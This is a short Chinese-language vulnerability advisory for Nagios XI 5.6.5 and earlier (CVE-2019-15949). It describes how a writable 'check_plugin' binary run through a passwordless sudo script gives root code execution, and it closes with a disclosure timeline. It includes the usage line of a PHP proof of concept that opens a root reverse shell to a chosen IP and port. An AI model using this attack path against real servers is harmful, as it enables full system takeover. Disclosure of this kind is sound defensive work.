Nagios XI <= 5.6.5 存在一个漏洞,允许攻击者利用 RCE 将权限提升至 root。
该漏洞利用需要以 'nagios' 用户身份访问服务器,或通过 Web 界面获得 CCM 访问权限并具备管理插件的权限。
通过下载系统配置文件(profile.php?cmd=download)所调用的 getprofile.sh 脚本,会借助免密码的 sudo 条目以 root 身份执行;该脚本会执行属于 nagios 用户的 'check_plugin' 可执行文件。
登录 Nagios XI 且具备修改插件权限的用户,或服务器上的 'nagios' 用户,均可修改 'check_plugin' 可执行文件,并插入可以 root 身份执行的恶意命令。
已开发出一个 PHP POC,可上传恶意载荷,从而获得一个 root 反向 Shell。
用法:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
向 Nagios 报告时间:2019 年 7 月 29 日
Nagios 确认时间:2019 年 7 月 29 日
在 5.6.6 版本中修复时间:2019 年 8 月 20 日
分配 CVE 时间:2019 年 9 月 6 日(CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
